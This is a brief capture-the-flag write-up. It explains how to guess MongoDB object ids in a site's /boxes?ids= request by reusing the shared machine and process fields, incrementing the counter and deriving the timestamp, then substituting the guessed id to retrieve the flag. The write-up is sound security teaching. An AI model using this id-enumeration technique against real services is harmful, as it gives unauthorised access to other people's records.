Continuing your inspection of the website, you see it makes a network request to /boxes?ids=<id1>,<id2>,<id3>. From either the hint or previous knowledge, you can determine that these are MongoDB object ids. Googling what makes up a MongoDB object id, you find how it is made. The machine and process ID are shared, the counter can just be incremented by one, and the timestamp can be gotten through this useful website (be careful of time zones though).

After reconstructing the object id, substituting it for one of the current ids gives the flag.